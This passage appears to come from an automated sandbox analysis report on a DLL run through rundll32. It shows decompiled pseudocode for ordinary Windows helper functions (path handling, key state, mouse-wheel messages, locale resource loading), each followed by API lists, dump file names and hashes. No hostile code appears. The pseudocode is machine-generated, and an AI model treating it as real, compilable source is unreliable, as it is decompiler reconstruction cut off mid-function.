                                                                                                            										goto L15;
                                                                                                            									} else {
                                                                                                            										FindClose(_t49);
                                                                                                            										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
                                                                                                            											goto L6;
                                                                                                            										} else {
                                                                                                            											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
                                                                                                            											goto L15;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								L6:
                                                                                                            								_t74 = 0;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
                                                                                                            						_t43 = _t74;
                                                                                                            					} else {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
                                                                                                            					L3:
                                                                                                            					_t43 = 0;
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                                                            				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025931
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                              • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                                                              • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                                                            • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                                                            • CharUpperA.USER32(?), ref: 100259DD
                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4080879615-0
                                                                                                            • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                                                            • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr* _v20;
                                                                                                            				struct tagPOINT _v28;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed char _v69;
                                                                                                            				char _v76;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t62;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t70;
                                                                                                            				intOrPtr _t77;
                                                                                                            				short _t78;
                                                                                                            				short _t85;
                                                                                                            				short _t90;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t114;
                                                                                                            				intOrPtr* _t116;
                                                                                                            
                                                                                                            				_t113 = _a4;
                                                                                                            				_t116 = __ecx;
                                                                                                            				if(E10020B0B(__ecx, _t113) != 0) {
                                                                                                            					L37:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				_t114 =  *((intOrPtr*)(_t113 + 4));
                                                                                                            				_v20 = E10008325(__ecx);
                                                                                                            				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
                                                                                                            					if(_t114 < 0x200 || _t114 > 0x209) {
                                                                                                            						if(_t114 < 0xa0 || _t114 > 0xa9) {
                                                                                                            							goto L30;
                                                                                                            						} else {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L8:
                                                                                                            						_v16 = E100373DB();
                                                                                                            						_t70 = _a4;
                                                                                                            						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
                                                                                                            						_v28.x =  *(_t70 + 0x14);
                                                                                                            						ScreenToClient( *(_t116 + 0x1c),  &_v28);
                                                                                                            						E10011C50( &_v76, 0, 0x30);
                                                                                                            						_v76 = 0x28;
                                                                                                            						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                                                            						_t128 = _v40 - 0xffffffff;
                                                                                                            						_v8 = _t77;
                                                                                                            						if(_v40 != 0xffffffff) {
                                                                                                            							_push(_v40);
                                                                                                            							E100107C8(0x201, _t114, _t116, _t128);
                                                                                                            						}
                                                                                                            						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                            							__eflags = _t114 - 0x201;
                                                                                                            							if(_t114 != 0x201) {
                                                                                                            								_t90 = GetKeyState(1);
                                                                                                            								__eflags = _t90;
                                                                                                            								if(_t90 < 0) {
                                                                                                            									_v8 =  *((intOrPtr*)(_v16 + 0x78));
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_v12 = 1;
                                                                                                            						}
                                                                                                            						if(_v8 < 0 || _v12 != 0) {
                                                                                                            							_t78 = GetKeyState(1);
                                                                                                            							__eflags = _t78;
                                                                                                            							if(_t78 >= 0) {
                                                                                                            								L28:
                                                                                                            								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                                                            								KillTimer( *(_t116 + 0x1c), 0xe001);
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							__eflags = _v12;
                                                                                                            							if(_v12 == 0) {
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							goto L28;
                                                                                                            						} else {
                                                                                                            							if(_t114 != 0x202) {
                                                                                                            								__eflags =  *(_t116 + 0x78) & 0x00000008;
                                                                                                            								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
                                                                                                            									L25:
                                                                                                            									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
                                                                                                            									L29:
                                                                                                            									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t85 = GetKeyState(1);
                                                                                                            								__eflags = _t85;
                                                                                                            								if(_t85 < 0) {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								_t109 = _v16;
                                                                                                            								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
                                                                                                            								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            								_push(0x12c);
                                                                                                            								_push(0xe000);
                                                                                                            								L24:
                                                                                                            								E1002F4CC(_t116);
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                                                            							_push(0xc8);
                                                                                                            							_push(0xe001);
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L30:
                                                                                                            					_t62 = E10022AD5(_t116);
                                                                                                            					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
                                                                                                            						if(_v20 == 0) {
                                                                                                            							L35:
                                                                                                            							if(IsWindow( *(_t116 + 0x1c)) == 0) {
                                                                                                            								goto L38;
                                                                                                            							}
                                                                                                            							return E10021527(_a4);
                                                                                                            						} else {
                                                                                                            							goto L33;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L33:
                                                                                                            							_t115 = _v20;
                                                                                                            							_push(_a4);
                                                                                                            							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
                                                                                                            								goto L37;
                                                                                                            							}
                                                                                                            							_t68 = E10022A96(_t115);
                                                                                                            							_v20 = _t68;
                                                                                                            							if(_t68 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L35;
                                                                                                            						}
                                                                                                            						goto L37;
                                                                                                            					} else {
                                                                                                            						L38:
                                                                                                            						__eflags = 0;
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

























                                                                                                            0x1002ff13
                                                                                                            0x1002ff13
                                                                                                            0x1002ff0b
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002ff1a
                                                                                                            0x1002ff84
                                                                                                            0x1002ff8a
                                                                                                            0x1002ff8d
                                                                                                            0x1002ff95
                                                                                                            0x1002ff9b
                                                                                                            0x1002ffa9
                                                                                                            0x00000000
                                                                                                            0x1002ffa9
                                                                                                            0x1002ff8f
                                                                                                            0x1002ff93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff22
                                                                                                            0x1002ff28
                                                                                                            0x1002ff42
                                                                                                            0x1002ff46
                                                                                                            0x1002ff73
                                                                                                            0x1002ff7a
                                                                                                            0x1002ffaf
                                                                                                            0x1002ffb5
                                                                                                            0x00000000
                                                                                                            0x1002ffb5
                                                                                                            0x1002ff4a
                                                                                                            0x1002ff50
                                                                                                            0x1002ff53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff58
                                                                                                            0x1002ff5b
                                                                                                            0x1002ff5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff60
                                                                                                            0x1002ff65
                                                                                                            0x1002ff6a
                                                                                                            0x1002ff6c
                                                                                                            0x00000000
                                                                                                            0x1002ff6c
                                                                                                            0x1002ff30
                                                                                                            0x1002ff36
                                                                                                            0x1002ff3b
                                                                                                            0x00000000
                                                                                                            0x1002ff3b
                                                                                                            0x1002ff1a
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffba
                                                                                                            0x1002ffc2
                                                                                                            0x1002ffce
                                                                                                            0x1002fff2
                                                                                                            0x1002fffd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd3
                                                                                                            0x1002ffe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffe6
                                                                                                            0x1002ffed
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x1002ffc2

                                                                                                            APIs
                                                                                                              • Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F
                                                                                                            • ScreenToClient.USER32 ref: 1002FEA5
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF02
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF4A
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF84
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002FFA9
                                                                                                            • IsWindow.USER32(?), ref: 1002FFF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$ClientKillParentScreenTimerWindow
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1540673551-3887548279
                                                                                                            • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                                                            • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E10032A2D(void* __ecx, signed int _a4, long _a8) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				long _t24;
                                                                                                            				void* _t29;
                                                                                                            				int _t32;
                                                                                                            				struct HWND__* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t29 = __ecx;
                                                                                                            				if(GetKeyState(0x11) < 0) {
                                                                                                            					_push(8);
                                                                                                            					_pop(0);
                                                                                                            				}
                                                                                                            				if(GetKeyState(0x10) < 0) {
                                                                                                            					_push(4);
                                                                                                            					_pop(0);
                                                                                                            				}
                                                                                                            				_t36 = GetFocus();
                                                                                                            				_v8 = GetDesktopWindow();
                                                                                                            				if(_t36 != 0) {
                                                                                                            					_t32 = _a4 << 0x10;
                                                                                                            					do {
                                                                                                            						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                                                                                            						_t36 = GetParent(_t36);
                                                                                                            					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                                                                                            				} else {
                                                                                                            					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                                                                                            				}
                                                                                                            				return _t24;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 10032A3E
                                                                                                            • GetKeyState.USER32(00000010), ref: 10032A4E
                                                                                                            • GetFocus.USER32 ref: 10032A5E
                                                                                                            • GetDesktopWindow.USER32 ref: 10032A66
                                                                                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 10032A8A
                                                                                                            • SendMessageA.USER32(00000000,0000020A,?,?), ref: 10032AA9
                                                                                                            • GetParent.USER32(00000000), ref: 10032AB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4150626516-0
                                                                                                            • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                                                            • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v284;
                                                                                                            				intOrPtr _t10;
                                                                                                            				void* _t15;
                                                                                                            				void* _t19;
                                                                                                            				void* _t20;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_t22 = __esi;
                                                                                                            				_t20 = __ecx;
                                                                                                            				_t19 = __ebx;
                                                                                                            				_t27 = _a8 - 0x800;
                                                                                                            				_t10 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t10;
                                                                                                            				if(_a8 != 0x800) {
                                                                                                            					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
                                                                                                            					if(__eflags != 0) {
                                                                                                            						goto L2;
                                                                                                            					} else {
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					lstrcpyA( &_a8, "LOC");
                                                                                                            					L2:
                                                                                                            					_push(_t22);
                                                                                                            					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
                                                                                                            					if(_t15 == 0xffffffff || _t15 >= 0x112) {
                                                                                                            						_t12 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_t12 = LoadLibraryA( &_v284);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t12, _v8);
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryLoadLocalelstrcpy
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 864663389-519433814
                                                                                                            • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                                                            • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v24;
                                                                                                            				void* _v28;
                                                                                                            				void* _v32;
                                                                                                            				int _v36;
                                                                                                            				int _v40;
                                                                                                            				signed short _v44;
                                                                                                            				int _v52;
                                                                                                            				int _v56;
                                                                                                            				int _v60;
                                                                                                            				int _v64;
                                                                                                            				intOrPtr _t42;
                                                                                                            				struct HINSTANCE__* _t43;
                                                                                                            				_Unknown_base(*)()* _t44;
                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                            				void* _t47;
                                                                                                            				signed int _t50;
                                                                                                            				signed short _t65;
                                                                                                            				signed int _t66;
                                                                                                            				int _t70;
                                                                                                            				signed short _t71;
                                                                                                            				signed int _t72;
                                                                                                            				signed short _t78;
                                                                                                            				signed int _t79;
                                                                                                            				char* _t85;
                                                                                                            				int _t87;
                                                                                                            				signed int _t95;
                                                                                                            				signed int _t99;
                                                                                                            				int _t100;
                                                                                                            				int _t101;
                                                                                                            				void* _t105;
                                                                                                            				void* _t109;
                                                                                                            
                                                                                                            				_t42 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t85 = 0;
                                                                                                            				_v8 = _t42;
                                                                                                            				_v28 = 0;
                                                                                                            				_t43 = GetModuleHandleA("kernel32.dll");
                                                                                                            				_v36 = _t43;
                                                                                                            				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
                                                                                                            				if(_t44 == 0) {
                                                                                                            					if(GetVersion() >= 0) {
                                                                                                            						_t46 = GetModuleHandleA("ntdll.dll");
                                                                                                            						if(_t46 == 0) {
                                                                                                            							L13:
                                                                                                            							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
                                                                                                            							_t105 = 1;
                                                                                                            							_t99 = 0;
                                                                                                            							if(1 <= _t85) {
                                                                                                            								L16:
                                                                                                            								_t47 = 0;
                                                                                                            								L17:
                                                                                                            								return E100117AE(_t47, _v8);
                                                                                                            							} else {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L14:
                                                                                                            								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
                                                                                                            								_pop(_t88);
                                                                                                            								if(_t47 != _t85) {
                                                                                                            									goto L17;
                                                                                                            								}
                                                                                                            								_t99 =  &(1[_t99]);
                                                                                                            								if(_t99 < _t105) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						_t88 =  &_v28;
                                                                                                            						_v28 = 0;
                                                                                                            						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
                                                                                                            						if(_v28 == 0) {
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_t50 = _v28 & 0x0000ffff;
                                                                                                            						_t88 = _t50 & 0x000003ff;
                                                                                                            						_t100 = _t50 & 0x3ff;
                                                                                                            						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
                                                                                                            						_v60 = ConvertDefaultLocale(_t100);
                                                                                                            						_push(2);
                                                                                                            						L12:
                                                                                                            						_pop(0);
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					_v32 = 0;
                                                                                                            					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
                                                                                                            						_v36 = 0x10;
                                                                                                            						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
                                                                                                            							_t65 = _v44;
                                                                                                            							_v28 = _t65;
                                                                                                            							_t66 = _t65 & 0x0000ffff;
                                                                                                            							_t88 = _t66 & 0x000003ff;
                                                                                                            							_t101 = _t66 & 0x3ff;
                                                                                                            							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
                                                                                                            							_t70 = ConvertDefaultLocale(_t101);
                                                                                                            							_push(2);
                                                                                                            							_v60 = _t70;
                                                                                                            							_pop(0);
                                                                                                            						}
                                                                                                            						RegCloseKey(_v32);
                                                                                                            					}
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            				_t71 =  *_t44();
                                                                                                            				_v28 = _t71;
                                                                                                            				_t72 = _t71 & 0x0000ffff;
                                                                                                            				_t95 = _t72 & 0x3ff;
                                                                                                            				_v32 = _t95;
                                                                                                            				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
                                                                                                            				_v60 = ConvertDefaultLocale(_v32);
                                                                                                            				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
                                                                                                            				_v28 = _t78;
                                                                                                            				_t79 = _t78 & 0x0000ffff;
                                                                                                            				_t88 = _t79 & 0x000003ff;
                                                                                                            				_t87 = _t79 & 0x3ff;
                                                                                                            				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
                                                                                                            				_v52 = ConvertDefaultLocale(_t87);
                                                                                                            				_push(4);
                                                                                                            				_t85 = 0;
                                                                                                            				goto L12;
                                                                                                            			}



































                                                                                                            0x100349d3
                                                                                                            0x100349d5
                                                                                                            0x100349d8
                                                                                                            0x100349dd
                                                                                                            0x100349df
                                                                                                            0x100349ea
                                                                                                            0x100349ef
                                                                                                            0x100349f2
                                                                                                            0x100349f4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            • GetVersion.KERNEL32 ref: 100349FB
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                                                            • ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10034A98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 780041395-483790700
                                                                                                            • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                                                            • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v16;
                                                                                                            				char _v17;
                                                                                                            				char _v272;
                                                                                                            				struct _WNDCLASSEXA _v320;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t52;
                                                                                                            				signed int _t56;
                                                                                                            				char _t58;
                                                                                                            				long _t60;
                                                                                                            				int _t71;
                                                                                                            				long _t81;
                                                                                                            				CHAR* _t83;
